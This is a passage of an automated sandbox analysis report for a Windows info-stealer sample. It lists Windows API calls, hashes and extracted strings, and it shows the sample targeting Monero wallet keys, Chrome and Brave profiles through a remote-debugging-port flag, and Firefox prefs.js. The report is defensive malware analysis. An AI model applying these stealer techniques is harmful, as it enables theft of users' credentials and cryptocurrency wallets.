                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 56549b192f3f305fdf740bcfe534053a0cbf7ab8533e9e07c32f4f81edd24fae
                                  • Instruction ID: b34663c76fa6c8182ffb8c0f15587a1cbd7b498d567c6d3ff22bdadd6aa57a6a
                                  • Opcode Fuzzy Hash: 56549b192f3f305fdf740bcfe534053a0cbf7ab8533e9e07c32f4f81edd24fae
                                  • Instruction Fuzzy Hash: C0E086B094E308FFE750DBA19C0EB0C7668DB04B01F100094F70C761D0C6B425848658
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BA10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BA10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: d44953b3a03f123baff9e7e8220e69b0b1ba2dbe349c811510cb2fbe49e70c4d
                                  • Instruction ID: 4d89d4c0c97a24a6cc7c00652c0c8987367e78a671ac1407f7b3669113950287
                                  • Opcode Fuzzy Hash: d44953b3a03f123baff9e7e8220e69b0b1ba2dbe349c811510cb2fbe49e70c4d
                                  • Instruction Fuzzy Hash: BCF0E9B1641204BBE7249AB89C59FAEB7DCE705704F300844F544E7280D5719E04C7A0
                                  APIs
                                    • Part of subcall function 00BB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7AA0
                                    • Part of subcall function 00BB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7AA7
                                    • Part of subcall function 00BB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB7ABF
                                    • Part of subcall function 00BB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7A10
                                    • Part of subcall function 00BB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A17
                                    • Part of subcall function 00BB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB7A2F
                                  • ExitProcess.KERNEL32 ref: 00BA11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: dedae4b988104fd38eb6da971b919a9cd37c6e08f07a2db39e9122352222e17f
                                  • Instruction ID: ea00d28f94d85e3a36d9e4a3fb68e4689e8750eae6779d84a202b3df3b4d0495
                                  • Opcode Fuzzy Hash: dedae4b988104fd38eb6da971b919a9cd37c6e08f07a2db39e9122352222e17f
                                  • Instruction Fuzzy Hash: 39E012A594830157DE60B7B67C07B7B32CC9B5534EF000894F908B2102EEA5E8458665
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00BC0B32,00BC0B2F,00000000,?,?,?,00BC1450,00BC0B2E), ref: 00BABEC5
                                  • StrCmpCA.SHLWAPI(?,00BC1454), ref: 00BABF33
                                  • StrCmpCA.SHLWAPI(?,00BC1458), ref: 00BABF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAC8A9
                                  • FindClose.KERNEL32(000000FF), ref: 00BAC8BB
                                  Strings
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BAC495
                                  • Brave, xrefs: 00BAC0E8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BAC3B2
                                  • Google Chrome, xrefs: 00BAC6F8
                                  • \Brave\Preferences, xrefs: 00BAC1C1
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BAC534
                                  • Preferences, xrefs: 00BAC104
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: d37bb654ea698a604e2efb7e2d09f8b1e47f0fbd97768868838215b40ef0c559
                                  • Instruction ID: 3b22671935f5e2532155fed4aa083dca9cc46cef0f00f2186c28c0db651ad373
                                  • Opcode Fuzzy Hash: d37bb654ea698a604e2efb7e2d09f8b1e47f0fbd97768868838215b40ef0c559
                                  • Instruction Fuzzy Hash: C0521072910108ABCF24FB60DD96EFE77BDAF55300F4045E8B51A66191EE709B48CFA2
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB3B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB3B33
                                  • lstrcat.KERNEL32(?,?), ref: 00BB3B85
                                  • StrCmpCA.SHLWAPI(?,00BC0F58), ref: 00BB3B97
                                  • StrCmpCA.SHLWAPI(?,00BC0F5C), ref: 00BB3BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB3EB7
                                  • FindClose.KERNEL32(000000FF), ref: 00BB3ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 8335d576999c724415a54f0ca8648a1b9fa8feef52c7a0706b35c5d76a756700
                                  • Instruction ID: 0952194332dddee97c71c19df59e419ed203e449551350250f0c4a84cf7b2f28
                                  • Opcode Fuzzy Hash: 8335d576999c724415a54f0ca8648a1b9fa8feef52c7a0706b35c5d76a756700
                                  • Instruction Fuzzy Hash: C9A12EB1A002089FDB34DFA4DC85FFA73B8AB48700F4445D9B64DA6191EB709B88CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB4B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB4B93
                                  • StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB4BC1
                                  • StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4DCD
                                  • FindClose.KERNEL32(000000FF), ref: 00BB4DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 15a6e6c58b6d15193af54663b81b52cedb99a060f3b6c9f2eae519813808896d
                                  • Instruction ID: 194bbca42f65eeefff9b78f8aad9f78783ccc6d15ac3bff8e7827e022832885a
                                  • Opcode Fuzzy Hash: 15a6e6c58b6d15193af54663b81b52cedb99a060f3b6c9f2eae519813808896d
                                  • Instruction Fuzzy Hash: CD6133B1904218AFCB20EBA4DC45FEA73BCBB48700F0045DCB65DA6151EB70AB88CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB47D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB47D7
                                  • wsprintfA.USER32 ref: 00BB47F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB480D
                                  • StrCmpCA.SHLWAPI(?,00BC0FAC), ref: 00BB483B
                                  • StrCmpCA.SHLWAPI(?,00BC0FB0), ref: 00BB4851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB48DB
                                  • FindClose.KERNEL32(000000FF), ref: 00BB48F0
                                  • lstrcat.KERNEL32(?,0130EDA8), ref: 00BB4915
                                  • lstrcat.KERNEL32(?,0130DFD8), ref: 00BB4928
                                  • lstrlen.KERNEL32(?), ref: 00BB4935
                                  • lstrlen.KERNEL32(?), ref: 00BB4946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: d834798ad79d18f85159c9336bce565f343569d7ddf58bfe8948fa02bbef2d4f
                                  • Instruction ID: 4cdde8c38113312b5e9aa27b261eb1706a75d3310931bea498c21b19aa2c1ba2
                                  • Opcode Fuzzy Hash: d834798ad79d18f85159c9336bce565f343569d7ddf58bfe8948fa02bbef2d4f
                                  • Instruction Fuzzy Hash: CC5122B1904218AFCB24EB70DC89FEE77BCAB58700F4045D8B65DA6151EB709AC8CF91
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB4113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB412A
                                  • StrCmpCA.SHLWAPI(?,00BC0F94), ref: 00BB4158
                                  • StrCmpCA.SHLWAPI(?,00BC0F98), ref: 00BB416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB42BC
                                  • FindClose.KERNEL32(000000FF), ref: 00BB42D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 9be50566626eaa9a441ddfd6e1df0b596ad02c42dca0958f80d233d59d3a622c
                                  • Instruction ID: 4030d115c0f961acc126d579d1f27b8455dc649e88aea779cdad039a21522bc4
                                  • Opcode Fuzzy Hash: 9be50566626eaa9a441ddfd6e1df0b596ad02c42dca0958f80d233d59d3a622c
                                  • Instruction Fuzzy Hash: D55144B1904218AFCB24EBB4DC85EEA77BCBB58300F4045DCB659A6051DB719BC9CF90
                                  APIs
                                  • wsprintfA.USER32 ref: 00BAEE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BAEE55
                                  • StrCmpCA.SHLWAPI(?,00BC1630), ref: 00BAEEAB
                                  • StrCmpCA.SHLWAPI(?,00BC1634), ref: 00BAEEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAF3AE
                                  • FindClose.KERNEL32(000000FF), ref: 00BAF3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: ca16ea7eeae1712659cc0de4d62803754a75e765463a4e238d0f691ec250fbbb
                                  • Instruction ID: 48e5559bedba4dbffaea7e049c23b49ff60fce8a9778eb85b76da7fd7138cf92
                                  • Opcode Fuzzy Hash: ca16ea7eeae1712659cc0de4d62803754a75e765463a4e238d0f691ec250fbbb
                                  • Instruction Fuzzy Hash: E7E1E272D11118ABDF64FB60CDA2EFE77B9AF54300F4045E9B41A62092EE706B89CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: f20b7e8fb1fa7f8470ddabcf9ac0f2e96dc60d388a075d4426e29f16636c7186
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: FBE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC16B0,00BC0D97), ref: 00BAF81E
                                  • StrCmpCA.SHLWAPI(?,00BC16B4), ref: 00BAF86F
                                  • StrCmpCA.SHLWAPI(?,00BC16B8), ref: 00BAF885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAFBB1
                                  • FindClose.KERNEL32(000000FF), ref: 00BAFBC3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 6222699e765647de0058176667fe1b7423329bf2de4dec47995d04d5413fce44
                                  • Instruction ID: 9ca9566db32e8fd8d6b33f384fbb177a9cb46cc04617e630caae3f3933e84584
                                  • Opcode Fuzzy Hash: 6222699e765647de0058176667fe1b7423329bf2de4dec47995d04d5413fce44
                                  • Instruction Fuzzy Hash: F7B13271D10108ABCB24FFA4DD96FFE77B9AF55300F4085E8A41A66191EF709B48CB91
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC523C,?,?,?,00BC52E4,?,?,00000000,?,00000000), ref: 00BA1963
                                  • StrCmpCA.SHLWAPI(?,00BC538C), ref: 00BA19B3
                                  • StrCmpCA.SHLWAPI(?,00BC5434), ref: 00BA19C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BA1D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA1E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BA1E60
                                  • FindClose.KERNEL32(000000FF), ref: 00BA1E72
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 46737cfc00f68d31c820c07d6cc67f415a80d6672cdfaada932bffb6164fab83
                                  • Instruction ID: 47be8e5d56fc93fc9ad6694863a293629c13c828463f15f4dadd8304eb914c68
                                  • Opcode Fuzzy Hash: 46737cfc00f68d31c820c07d6cc67f415a80d6672cdfaada932bffb6164fab83
                                  • Instruction Fuzzy Hash: 8812CE71D10118ABCF65FB60CCA6EFE77B9AF54300F4045E9A51A66091EFB06B88CF61
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BC0C32), ref: 00BADF5E
                                  • StrCmpCA.SHLWAPI(?,00BC15C0), ref: 00BADFAE
                                  • StrCmpCA.SHLWAPI(?,00BC15C4), ref: 00BADFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAE4E0
                                  • FindClose.KERNEL32(000000FF), ref: 00BAE4F2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: c6294851f78a216cb4a34972c32663db756b028a34068a0f191aee6de4c49332
                                  • Instruction ID: 9b9f957895346c0a2f962c335708cea82b95e6f6a4da22075edfcf91e6d0dc56
                                  • Opcode Fuzzy Hash: c6294851f78a216cb4a34972c32663db756b028a34068a0f191aee6de4c49332
                                  • Instruction Fuzzy Hash: 42F19F71D24118ABCF25FB60CDA6EFE77B9AF55300F8045D9A01A62091EFB06B89CF51
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC15A8,00BC0BAF), ref: 00BADBEB
                                  • StrCmpCA.SHLWAPI(?,00BC15AC), ref: 00BADC33
                                  • StrCmpCA.SHLWAPI(?,00BC15B0), ref: 00BADC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BADECC
                                  • FindClose.KERNEL32(000000FF), ref: 00BADEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 4abc06ff11154c10e9615f4a24170a08fb8882d77157844bde9645e78a098e87
                                  • Instruction ID: 3b6e0ca77205167cecbd41f99a548a13d84cc4ab19394eb8470827838dc160e4
                                  • Opcode Fuzzy Hash: 4abc06ff11154c10e9615f4a24170a08fb8882d77157844bde9645e78a098e87
                                  • Instruction Fuzzy Hash: FC915272E00104ABCF14FB74DD96AFD77BDAB95300F4045E8B85B66181EE709B48CBA2
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB9905
                                  • Process32First.KERNEL32(00BA9FDE,00000128), ref: 00BB9919
                                  • Process32Next.KERNEL32(00BA9FDE,00000128), ref: 00BB992E
                                  • StrCmpCA.SHLWAPI(?,00BA9FDE), ref: 00BB9943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BB995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BB997A
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB9987
                                  • CloseHandle.KERNEL32(00BA9FDE), ref: 00BB9993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 0e4e1e5527e0dedfa90815e82dce0cf9e9d8deec541f97731fa0319d873baae2
                                  • Instruction ID: 1599f6dd45254aba9a2276377cac2360cec3c1c52484246d24ae551fcb13ae5a
                                  • Opcode Fuzzy Hash: 0e4e1e5527e0dedfa90815e82dce0cf9e9d8deec541f97731fa0319d873baae2
                                  • Instruction Fuzzy Hash: 50111F75904208AFDB64DFA1DC88BEDB7B8AB48700F1045CCF649B6250D7749A84CF90
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00BC05B7), ref: 00BB7D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BB7D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BB7D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BB7DF2
                                  • LocalFree.KERNEL32(00000000), ref: 00BB7EB2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: b59427387ab00a701c31d1cc0556fd04b173b02969b8b642c0c53f8311497d46
                                  • Instruction ID: f48ea10fff3ccd085b2c523a0e04bf8075aa2a6b6bc10df115edd84a026b69df
                                  • Opcode Fuzzy Hash: b59427387ab00a701c31d1cc0556fd04b173b02969b8b642c0c53f8311497d46
                                  • Instruction Fuzzy Hash: DC413C71954218ABCB24DB94DC99BFEB7B8FF54700F1041D9E00A66291DBB46F88CFA1
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BC0D79), ref: 00BAE5A2
                                  • StrCmpCA.SHLWAPI(?,00BC15F0), ref: 00BAE5F2
                                  • StrCmpCA.SHLWAPI(?,00BC15F4), ref: 00BAE608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAECDF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: fb834d342011b8366e26f2221a7c8ec41137ccf815681dc216ef8f2c29226433
                                  • Instruction ID: d4e1769243b8006e73698265e9ad2544cebca86b426b4767c5476c6cbc359150
                                  • Opcode Fuzzy Hash: fb834d342011b8366e26f2221a7c8ec41137ccf815681dc216ef8f2c29226433
                                  • Instruction Fuzzy Hash: 0D12F271D10118ABCF24FB60DDA6EFD77B9AF54300F4045E9B51A66091EEB06B48CFA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
